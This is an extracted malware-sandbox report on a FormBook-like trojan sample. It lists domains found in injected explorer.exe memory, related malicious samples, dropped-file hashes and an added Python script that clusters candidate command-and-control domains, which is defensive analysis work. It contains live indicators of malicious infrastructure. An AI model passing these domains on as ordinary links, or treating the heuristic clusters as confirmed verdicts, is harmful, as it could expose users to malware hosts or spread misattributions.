https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.getrightspt.comReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.betmonde396.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/v1/news/Feed/Windows?6i | explorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.webinarcerdaskanindonesia.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.livewey.net | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.brasilbikeshopsc.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.getrightspt.com | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.musiclessonsandmore.com | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.prolongdogslife.com/igbn/ | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.creatievecontentpeople.comReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.rusticramble.online | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.enet-insaat.comReferer: | explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.livewey.netReferer: | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.webinarcerdaskanindonesia.comReferer: | explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
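Every Source entry in the table above is an explorer.exe memory dump, which is where the report's process-injection signatures say the payload ends up, and every row is marked Malicious false with reputation unknown, so the URL table gives no verdict on its own. What it does show is a set of unrelated domains that all carry the same URI path, /igbn/, mixed with msn.com and windows.com noise from the sandbox desktop; FormBook configurations embed exactly such a list of domains sharing one path, and the in-memory list is packed tightly enough that one domain is sometimes glued onto the next (http://www.freakyressop.xyz/igbn/www.nftcopyrights.xyz) or onto an HTTP header name (http://www.getrightspt.comReferer:). The Python below is an added triage example, not Joe Sandbox code and not part of the report: it re-splits flattened rows of this shape, drops sandbox background hosts (the allowlist is an assumption), and groups the remaining hosts by first path segment so the shared-path cluster stands out. The sample rows are a constructed subset copied from the table; the process names used to anchor the parser come from the report's process list, here only explorer.exe.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: seven rows copied from the report's URL table in the flattened
# form the extracted page uses (URL, source dumps and Malicious flag run together
# on one line, the Reputation value on the next). It is a subset, not the full table.
SAMPLE_ROWS = """\
http://www.nftcopyrights.xyz/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmpfalse
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpfalse
unknown
http://www.mlharquitectura.com/igbn/explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
unknown
http://www.freakyressop.xyz/igbn/www.nftcopyrights.xyzexplorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmpfalse
unknown
http://www.azure1224.xyz/igbn/www.musiclessonsandmore.comexplorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpfalse
unknown
http://www.getrightspt.comReferer:explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmpfalse
unknown
https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
unknown
"""

# Shape of a Joe Sandbox memory-dump id as printed in the Source column.
DUMP_ID = r"\d{8}\.\d{8}\.\d+\.[0-9A-Fa-f]+(?:\.\d{8}){4}\.sdmp"
# Assumption: hosts treated as sandbox background noise rather than sample activity.
ALLOWLIST = ("msn.com", "microsoft.com", "windows.com", "bing.com")
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")


def parse_rows(text, processes=("explorer.exe",)):
    """Split flattened rows back into url / sources / malicious / reputation.

    `processes` are the process names that can appear in the Source column
    (taken from the report's process list). Anchoring on those literal names is
    what lets the URL be separated from the source text when the two are glued.
    """
    proc = "|".join(re.escape(p) for p in processes)
    row_re = re.compile(
        rf"^(?P<url>.+?)(?P<src>(?:(?:{proc}), {DUMP_ID}(?:, )?)+)(?P<mal>true|false)$"
    )
    src_re = re.compile(rf"(?P<proc>{proc}), (?P<dump>{DUMP_ID})")
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    rows = []
    for i, line in enumerate(lines):
        m = row_re.match(line)
        if not m:
            continue  # reputation line, header or a row tail; not a URL row
        rows.append({
            "url": m["url"],
            "sources": [(s["proc"], s["dump"]) for s in src_re.finditer(m["src"])],
            "malicious": m["mal"] == "true",
            "reputation": lines[i + 1] if i + 1 < len(lines) else "",
        })
    return rows


def is_allowlisted(host):
    return any(host == d or host.endswith("." + d) for d in ALLOWLIST)


def split_url(url):
    """Return (host, first path segment, extra hosts glued into the path)."""
    url = url.removesuffix("Referer:")  # HTTP header name stuck to the URL in memory
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    segs = [s for s in parts.path.split("/") if s]
    first = f"/{segs[0]}/" if segs else "/"
    # A second domain after the path is the next entry of the same in-memory list.
    glued = HOST_RE.findall("/".join(segs[1:]).lower())
    return host, first, glued


def candidate_c2_clusters(text, processes=("explorer.exe",), min_hosts=2):
    """Group non-allowlisted hosts by first path segment.

    FormBook-style configs carry many domains sharing one URI path, so a cluster
    of several hosts on the same path is the set to inspect. It is not proof that
    any one of them is the live C2; the rest are decoys by design.
    """
    clusters = defaultdict(set)
    for row in parse_rows(text, processes):
        host, first, glued = split_url(row["url"])
        if not host or is_allowlisted(host):
            continue
        clusters[first].add(host)
        clusters[first].update(glued)
    return {p: sorted(h) for p, h in clusters.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for path, hosts in candidate_c2_clusters(SAMPLE_ROWS).items():
        print(f"{path}: {len(hosts)} hosts -> {', '.join(hosts)}")
```

Run against the sample it reports one cluster, /igbn/ with five hosts, and drops www.getrightspt.com because a lone host on "/" says nothing. Feeding it the whole table from the page adds the remaining /igbn/ rows; the cluster is the list to pivot on (passive DNS, the Suricata hits elsewhere in this report), not a block list to deploy as-is.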
IP | Domain | Country | ASN | ASN Name | Malicious
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1524408
Start date and time:2024-10-02 18:56:54 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:VFylJFPzqX.exe
renamed because original name is a hash value
Original Sample Name:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@10/9@6/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 144
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.158, 2.23.209.176, 2.23.209.185, 2.23.209.189, 2.23.209.182, 2.23.209.181, 2.23.209.150, 2.23.209.177, 2.23.209.179, 2.23.209.140, 2.23.209.148, 2.23.209.149
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, p-static.bing.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, r.bing.com, api-msn-com.a-0003.a-msedge.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • VT rate limit hit for: VFylJFPzqX.exe
Time | Type | Description
12:58:00 | API Interceptor | 238917x Sleep call for process: explorer.exe modified
12:58:37 | API Interceptor | 1589378x Sleep call for process: cmmon32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.149.87.45 | http://www.hopp.bio/system802808 | malicious | Unknown | www.hopp.bio/system802808
34.149.87.45 | http://www.hopp.bio/xentreservicelonelinerservice/ | malicious | Unknown | www.hopp.bio/xentreservicelonelinerservice/
34.149.87.45 | http://www.hopp.bio/homeatttupdatesystem/ | malicious | Unknown | www.hopp.bio/homeatttupdatesystem/
34.149.87.45 | 0XLuA614VK.exe | malicious | FormBook | www.formytinyhome.com/lztc/
34.149.87.45 | ojtBIU0jhM.exe | malicious | FormBook, PureLog Stealer | www.project21il.com/v15n/?jL0=mpNYsDUcZmcNJCaLZJbaTUF3cJIt8ZB3rWyozfS6QmuFlBJoYbsDkDDYVEw5tDag3DFw&qN9=EFNxULM0Cf1t
34.149.87.45 | https://ynjac.com/click?redirect=http%3A%2F%2Fwww.KineticAgency.com&dID=1724778304747&hashId=404941f7b6ec62dc57c0bc5f930858f35215fdf2f3368224f3526a5023c4bc3ded39&linkName=www.KineticAgency.com | malicious | Unknown | www.kineticagency.com/
34.149.87.45 | PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat | malicious | FormBook, GuLoader, Remcos | www.martinminorgroup.com/oyqt/
34.149.87.45 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook | www.martinminorgroup.com/oyqt/
34.149.87.45 | qEW7hMvyV7.exe | malicious | FormBook | www.century21morenoycia.mx/yroe/
34.149.87.45 | NNj87.exe | malicious | FormBook | www.yamegoart.com/ve3w/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
td-ccm-neg-87-45.wixdns.net | https://kevinbeilgard.wixsite.com/my-site-1 | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://gyxgxuu.wixsite.com/juno | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://goodnessmail.wixsite.com/my-site-1 | malicious | HTMLPhisher | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://yhusbssgsuh.wixsite.com/my-site | malicious | HTMLPhisher | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://carpentevrt.wixsite.com/my-site | malicious | HTMLPhisher | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://esrrreynolds.wixstudio.io/my-site | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://dones9.wixsite.com/my-sitecvfc | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://mqgb111tk4b6.wixsite.com/my-site | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://carolb1711.wixsite.com/my-site | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://replynwebsms.wixsite.com/my-site | malicious | Unknown | 34.149.87.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATGS-MMD-ASUS | yakov.arm.elf | malicious | Mirai | 48.170.193.198
ATGS-MMD-ASUS | yakov.m68k.elf | malicious | Mirai | 48.31.2.229
ATGS-MMD-ASUS | yakov.mips.elf | malicious | Mirai | 48.249.96.183
ATGS-MMD-ASUS | yakov.arm7.elf | malicious | Mirai | 57.203.72.83
ATGS-MMD-ASUS | novo.arm.elf | malicious | Mirai, Moobot | 34.157.218.225
ATGS-MMD-ASUS | novo.arm64.elf | malicious | Mirai, Moobot | 57.196.194.180
ATGS-MMD-ASUS | novo.arm7.elf | malicious | Mirai, Moobot | 34.16.233.49
ATGS-MMD-ASUS | novo.mips.elf | malicious | Mirai, Moobot | 51.244.0.239
ATGS-MMD-ASUS | novo.mpsl.elf | malicious | Mirai, Moobot | 48.139.167.0
ATGS-MMD-ASUS | novo.ppc.elf | malicious | Mirai, Moobot | 34.182.187.24

No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | SecuriteInfo.com.Win32.MalwareX-gen.10870.27618.exe | malicious | Amadey, DarkTortilla, PureLog Stealer, RedLine, zgRAT |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | q.bin.exe | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 5W69EF4IxU.lnk | malicious | XWorm |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | LisectAVT_2403002A_74.exe | malicious | AgentTesla |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 10072024085940-0001 - HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe | malicious | DarkTortilla, Remcos |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0001.exe | malicious | AgentTesla |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | P1-635487.exe | malicious | Nanocore |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Order List Pdf.exe | malicious | AgentTesla |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exe | malicious | AgentTesla |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | order.exe | malicious | AgentTesla |
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):2.3046377270901885
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:aICmLyfC6jA2at2gCR0CPjzuiF9Y4lO8k:aIvyfC6jCtpw0QjzuiF9Y4lO8
                                                                                                                                                                                                                                      MD5:2B01D8AE203578B4E91AFFD2B4DE83EB
                                                                                                                                                                                                                                      SHA1:6AD485613B8BD3888FF87775766017F5282D4F06
                                                                                                                                                                                                                                      SHA-256:D54D503D5B0D182A465105A42B55777F1EC80243F3C264B172524D2DE3D95BB8
                                                                                                                                                                                                                                      SHA-512:BCEA8F028DC961A03044F7E1BD63ECDE5C45E798BFBE01F55BDA0463ACC0B0619353113076E3A08F27C65D2CBB0774846BD398D7B29A7B647F864923A9C7AF66
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.6.1.9.6.0.3.1.7.1.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.c.2.8.9.3.8.-.9.1.a.d.-.4.d.6.8.-.8.a.9.f.-.8.7.8.6.7.c.c.3.1.3.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.f.e.7.7.b.1.-.0.6.5.1.-.4.b.8.f.-.b.2.d.6.-.f.2.7.7.e.b.e.f.9.f.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.4.-.0.0.0.1.-.0.0.1.4.-.5.0.b.f.-.4.a.3.9.e.3.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 17 streams, Wed Oct 2 16:59:23 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1009754
                                                                                                                                                                                                                                      Entropy (8bit):1.3985441790971482
                                                                                                                                                                                                                                      Encrypted:false
SSDEEP:1536:TwdXkYmsIUSh6lKmhaQwu5sQXmY9l9oNNPtCpw6v0B2xpwIdbV:TwdXkYmsFSwlKZu5sbtC+6v/pbV
MD5:50CABF4203478FA1EE8E97E86AA11C8E
SHA1:A51E8F57CB98D97E06796E579D4DC8CB333F7884
SHA-256:6D3F388785F5D1BE244344EAA4CD55CD248F544BD6B29FE5DB3CDE96954ADA36
SHA-512:90A442A9FE2C81A3A9E1B31EFBD815E1414B959D8AA9B00826F473F5CC09337ED4C07FD15F387751C8423897B77A6F9E42DACA85756E7E6AFBE35EC66AFAD99A
Malicious:false
Reputation:low
Preview:MDMP..a..... ........{.f................ .......,k..........4...............P.......d...............x.......8...........T...$........\......................................................................................................................eJ..............Lw......................T...........xl.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):10836
Entropy (8bit):3.706545197478689
Encrypted:false
SSDEEP:192:R6l7wVeJCex6YSQ2gmfqzViFprS89b/sSsVGY7f6Vm:R6lXJrx6Yl2gmfqzVO/sSOGY7fh
MD5:A037F6F643E12119A36B45B5A37A34D7
SHA1:6108CC379D60CE38CF8038EB175E561A023E659E
SHA-256:5B0168421DB3300E94F87C71E10A9DBA8F56FF91B752DB95542E81D4A62646A1
SHA-512:E36F2B5FA340FAD1824F08B147AEA98BC77DDE489A1A04CA2EBAAC16701201C64CA2EAA8FD91D44C4A9D8836653EC55484EDDA6492AF4873B42EF0B77AD1C573
Malicious:false
Reputation:low
Preview (decoded from UTF-16):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
	<OSVersionInformation>
		<WindowsNTVersion>10.0</WindowsNTVersion>
		<Build>19045</Build>
		<Product>(0x30): Windows 10 Pro</Product>
		<Edition>Professional</Edition>
		<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
		<Revision>2006</Revision>
		<Flavor>Multiprocessor Free</Flavor>
		<Architecture>X64</Architecture>
		<LCID>2057</LCID>
	</OSVersionInformation>
	<ProcessInformation>
		<Pid>4084</Pi

Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4724
Entropy (8bit):4.4671952874293925
Encrypted:false
SSDEEP:48:cvIwWl8zsVJg771I9ITWpW8VYgYm8M4JYmFrZyq85cdcAb9Q32d:uIjfvI7zi7VcJjZxba32d
MD5:00065564B531402D2995E8179794F807
SHA1:4C11EDC73B3F64813225F1DDC8CA2F058AADE028
SHA-256:CD95FFE44CB476DACD8372A652D2A0EEEF5E5BD4FD9D64E8BE4B96AE0C21D48D
SHA-512:56EB95F3D8070F46A586ECD74BE137AE0D71B3D799ACE9A659B20C5D21304D99F58DE8DAD8DEC45715E56855110BC48CD01B11CF91E1D7C951389B227156073A
Malicious:false
Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
  <tlm>
    <src>
      <desc>
        <mach>
          <os>
            <arg nm="vermaj" val="10" />
            <arg nm="vermin" val="0" />
            <arg nm="verbld" val="19045" />
            <arg nm="vercsdbld" val="2006" />
            <arg nm="verqfe" val="2006" />
            <arg nm="csdbld" val="2006" />
            <arg nm="versp" val="0" />
            <arg nm="arch" val="9" />
            <arg nm="lcid" val="2057" />
            <arg nm="geoid" val="223" />
            <arg nm="sku" val="48" />
            <arg nm="domain" val="0" />
            <arg nm="prodsuite" val="256" />
            <arg nm="ntprodtype" val="1" />
            <arg nm="platid" val="2" />
            <arg nm="tmsi" val="526082" />
            <arg nm="osinsty" val="1" />
            <arg nm="iever" val="11.789.19041.0-11.0.1000" />
            <arg nm="portos" val="0" />
            <arg nm="ram" val="409

Process:C:\Users\user\Desktop\VFylJFPzqX.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1626
Entropy (8bit):5.352382879659022
Encrypted:false
SSDEEP:48:MIHK5HKH1qHxviYHKh3oPtHo6hAHKze0HKHKMRmHKU57Uy:Pq5qHwRKYqh3oPtI6eqzxqqMRmqU57Uy
MD5:13BD7BD30A00DB52928E54B1CDC3885E
SHA1:505CA675FD9C4ABAA7422D0E300BC6DDC8C4E1CC
SHA-256:9FDF5F0CD379E0870A8FDEA29B2AAAC93DEB66B91B41E66372CF0F3A7D3E7E14
SHA-512:CDE3DD67B905244849E499CD0435D36457B31EE1DE74C4CF3D925C7D09E54DB862175B3CB143E14647E6341A7BA992E455B843907858DA0E067DADAD314F7A42
Malicious:true
Preview:
1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process:C:\Windows\explorer.exe
File Type:data
Category:dropped
Size (bytes):107416
Entropy (8bit):4.001150460909278
Encrypted:false
SSDEEP:768:Al8bkJGFKqXWIjk0QsVWohLNzLxKNCjBlzTPieb6PR1vP0TgJd5m5oypQqW3/gBJ:XkSKqTVWohDQeJBhOihGxnl5EFOPKSi
MD5:D43EE2C1AF96AF9515F86181D714FEDC
SHA1:0FDD8A1273BA02A6332660E2872A6826042AB5B6
SHA-256:C3924EBA84DEC346B2788BDABA2BE6FCA9C6DA0DD282F9F1FB168B932EF53CBF
SHA-512:7941575AF2BADC681E3E218127044DF6D6D4C55F40CE9D938D234E7BB8B0221BDDE856C8163F4369B35CBA427353E10847AAE09575B3E3AAB85C07C38182CE9D
Malicious:false
